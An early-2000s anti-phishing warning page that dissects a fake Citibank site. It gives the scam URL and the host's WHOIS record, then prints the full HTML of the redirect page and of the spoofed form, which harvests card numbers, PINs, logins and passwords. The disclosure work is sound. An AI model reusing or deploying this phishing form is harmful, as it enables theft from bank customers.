What is 'phishing'?
As more people use computers for handling financial transactions, from online banking to purchasing or selling goods at eBay, fraudsters have started use cleverly disguised spam to harvest information that allows them to break into online accounts and steal money.
Mails that typically claim to be from Citibank, eBay, PayPal or other banks state that because of some problem the recipient needs to confirm his/her access codes or his/her account will be suspended. This threat is supposed to scare people into acting rashly, without thinking.
Some of these emails look almost exactly like the real thing, complete with company logos, etc. Don't fall for it! Citibank, PayPal and other financial institutions never contact their customers supplying a link for re-entering their account numbers, passwords or PIN-codes. Though the links lead to websites that look like official company websites and in some cases even the browser displays a matching URL, these sites are in fact put up by fraudsters and are usually hosted on servers in China. It is suspected that Russian organized crime groups are the main operators of this type of scam.
'Phishing'-site hosted in China (China Telecom):
The actual scam website address (http://219.148.127.67/scripts/confirmation.htm) was still working two days after we received the spam email. The site is hosted by the following network:
inetnum: 219.148.0.0 - 219.148.159.255
netname: CHINATELECOM-he
descr: CHINANET hebei province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: BR3-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINATELECOM-he
changed: hostmaster@ns.chinanet.cn.net 20030820
status: ALLOCATED NON-PORTABLE
source: APNIC
person: Chinanet Hostmaster
address: No.31 ,jingrong street,beijing
address: 100032
country: CN
phone: 10-66027112
fax-no: 10-58501144
e-mail: hostmaster@ns.chinanet.cn.net
e-mail: anti-spam@ns.chinanet.cn.net
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: hostmaster@ns.chinanet.cn.net 20021016
remarks: hostmaster is not for spam complaint,please send spam
complaint to anti-spam@ns.chinanet.cn.net
source: APNIC
person: Bin Ren
nic-hdl: BR3-AP
e-mail: renbin@mail.he.cn
address: 10F Ximei Building NO.6 Jianshe South Street
address: Shijiazhuang 050011 China
phone: 311-5211551
fax-no: 311-5211578
country: CN
changed: renbin@mail.he.cn 20040430
mnt-by: MAINT-CHINATELECOM-HE
source: APNIC
When we checked on 2004-07-20, a total of 19 days after the initial email, the fraud website (http://219.148.127.67/scripts/confirmation.htm) was still active on the Chinanet server. It opens the real Citibank website, which shows a trustworthy-looking page with Citibank URL, but then pops up a window without URL line that runs a PHP script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Citibank</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/javascript">
<!-- Hide script from older browsers
setTimeout ("changePage()", 0);
function changePage() {
if (self.parent.frames.length != 0)
self.parent.location=document.location;
}
// end hiding contents -->
</script>
<meta http-equiv="refresh"
content="0;URL=https://web.da-us.citibank.com/cgi-bin/citifi/scripts/myciti/support.jsp">
<SCRIPT LANGUAGE="JavaScript">
<!--begin
{
window.open('pop.php','MyWindow','scrollbars=no,resizable=no,toolbar=no,
width=350,height=430,left=350,top=200');
}
// end -->
</SCRIPT>
</head>
<body>
</body>
</html>
Here is the PHP script for the child window:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Citibank - Confirm your identity</title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<style type="text/css">
<!--
.default
{
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
.defaultErr
{
font-family: Arial, Helvetica, sans-serif;
font-size: 11px;
color: #FF0000;
}
.style1 {font-family: Arial, Helvetica, sans-serif}
-->
</style>
</head>
<body topmargin="0" leftmargin="0" bgcolor="#FFFFFF">
<form name="Citi" method="post" runat="vdaemon" action="process.php">
<table width="350" height="61" border="0" align="center" cellpadding="0"
cellspacing="0" bordercolor="#111111" id="AutoNumber1"
style="border-collapse: collapse">
<tr>
<td height="36" background="http://www.citibank.co.uk/uk/images/wave_new.gif"></td>
</tr>
<tr>
<td width="100%" height="42" > <table width="350" height="42" border="0"
cellpadding="0" cellspacing="0">
<tr>
<td width="10" height="42"> </td>
<td width="340"><img src="http://www.citibank.co.uk/uk/images/logo3.gif"
width="96" height="42"></td>
</tr>
</table></td>
</tr>
</table>
<table width="350" border="0" align="center" cellpadding="0" cellspacing="0"
bordercolor="#111111" id="AutoNumber5" style="border-collapse: collapse">
<tr>
<td bgcolor="#CCCCCC"><img src="../images/trans.gif" width="1" height="1">
</td></font></td>
</tr>
</table>
<table width="350" border="0" align="center" cellpadding="3" cellspacing="0">
<tr>
<td height="22">
<div align="center"><b><font face="Arial, Helvetica, sans-serif" size="2">Please
update your ATM/Debit Card number</font></b></div>
</td>
</tr>
</table>
<table width="345" height="42" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="28">
<div align="center"><div class="defaultErr" id="VDaemonID_1"> </div>
</div></td>
</tr>
</table>
<table width="350" border="0" align="center" cellpadding="5" cellspacing="0"
bordercolor="#111111" id="AutoNumber4" style="border-collapse: collapse">
<tr>
<td align="right" width="106">
<div align="right"><font size="2" face="Arial, Helvetica, sans-serif">ATM/Debit
Card <br>
(CIN) / Card # </font></div>
</td>
<td width="224" align="left"><font face="Arial">
<input name="CardNumber" type="text" size="16" maxlength="16" />
</font><font face="Arial" size="1">
</font></td>
</tr>
<tr>
<td align="right" width="106">
<div align="right"><font size="2" face="Arial, Helvetica, sans-serif">ATM
PIN # </font></div>
</td>
<td align="left"><font face="Arial">
<input name="CurrentPIN" type="password" size="4" maxlength="4" />
</font><font face="Arial" size="1">
</font></td>
</tr>
<tr>
<td height="32" align="right" valign="top"><font size="2"
face="Arial, Helvetica, sans-serif">User
ID </font></td>
<td align="left" valign="top"><font face="Arial">
<input name="NewPIN" type="text" size="25" maxlength="25" />
</font></td>
</tr>
<tr>
<td height="56" align="right" valign="top"><font size="2"
face="Arial, Helvetica, sans-serif">Password
</font></td>
<td align="left" valign="top"><font face="Arial">
<input name="AccountNumber" type="password" id="AccountNumber"
size="25" maxlength="25" />
</font>
<div align="left" class="style1"><font size="1" color="#666666">To verify
your identity enter your login and<br>
password that you use to login on our site!</font></div>
<tr>
<td height="34" align="right" valign="top">
<div align="center" class="style1"></div>
</td>
<td align="left" valign="top"><font face="Arial" size="2">
<input name="Submit" type="image" id="Submit"
src="https://web-ao.da-us.citibank.com/images/univers/buttons/cont_btn.gif"
width="77" height="24" border="0" />
</font><font face="Arial"> </font>
</table>
<div align="left">
<table width="350" border="0" align="center" cellpadding="0" cellspacing="0"
bordercolor="#111111" id="AutoNumber5" style="border-collapse: collapse">
<tr>
<td bgcolor="#CCCCCC"><img src="../images/trans.gif" width="1" height="1"></td>
</tr>
</table>
</div>
<div align="left">
<table width="350" border="0" align="center" cellpadding="5" cellspacing="0"
bordercolor="#111111" id="AutoNumber6" style="border-collapse: collapse">
<tr>
<td width="163"><font face="Arial" size="1"><img border="0"
src="http://www.citibank.com/domain/images/mem_cgrp.gif" width="108" height="13"><br>
</font><font size="1"><span class="style1"><font color="#666666">
Copyright � 2004 Citicorp</font></span></font></td>
<td width="90"><div align="right"><font face="Arial" size="1" color="#666666">
<img src="https://www.citibank.com/us/cards/images/homepage/lock.gif"></font>
</div></td>
<td width="67"><div align="left" class="style1"><font size="1" color="#666666">
128bit SSL</font></div></td>
</tr>
</table>
</div>
<input type="hidden" name="VDaemonValidators"
value="O:13:"cvdvalruntime":5:{s:5:"sPage";s:16:"
/scripts/pop.php";s:5:"sArgs";s:0:"";s:7:"sAnchor";
s:0:"";s:5:"sForm";s:4:"Citi";s:6:"aNodes";
a:5:{i:0;O:7:"xmlnode":3:{s:5:"sName";s:11:"vlvalidator";
s:6:"aAttrs";a:4:{s:4:"name";s:13:"CardNumberReq";
s:4:"type";s:8:"required";s:7:"control";s:10:
"CardNumber";s:6:"errmsg";s:16:"Card # required.";}
s:9:"aSubNodes";a:0:{}}i:1;O:7:"xmlnode":3:{s:5:"sName";
s:11:"vlvalidator";s:6:"aAttrs";a:5:{s:4:"name";s:15:"
CardNumberCheck";s:4:"type";s:6:"custom";s:7:
"control";s:10:"CardNumber";s:6:"errmsg";
s:15:"Invalid card #.";s:8:"function";s:5:"CCVal";}
s:9:"aSubNodes";a:0:{}}i:2;O:7:"xmlnode":3:
s:5:"sName";s:11:"vlvalidator";s:6:"aAttrs";a:5:
{s:4:"name";s:18:"CardNumberNumCheck";s:4:"
type";s:9:"checktype";s:7:"control";s:10:"
CardNumber";s:6:"errmsg";s:15:"Invalid card #.";s:9:
"validtype";s:7:"integer";}s:9:"aSubNodes";a:0:
{}}i:3;O:7:"xmlnode":3:{s:5:"sName";s:11:"
vlvalidator";s:6:"aAttrs";a:4:{s:4:"name";s:13:
"CurrentPINReq";s:4:"type";s:8:"required";s:7:
"control";s:10:"CurrentPIN";s:6:"errmsg";s:21:
"Current PIN required.";}s:9:"aSubNodes";a:0:{}}i:4;O:7:
"xmlnode":3:{s:5:"sName";s:11:"vlvalidator";
s:6:"aAttrs";a:5:{s:4:"name";s:16:"
CurrentPINRegExp";s:4:"type";s:6:"regexp";s:7:
"control";s:10:"CurrentPIN";s:6:"errmsg";
s:20:"Invalid Current PIN.";s:6:"regexp";
s:9:"/^\d{4}$/";}s:9:"aSubNodes";a:0:{}}}}" />
</form>
</body>
</html>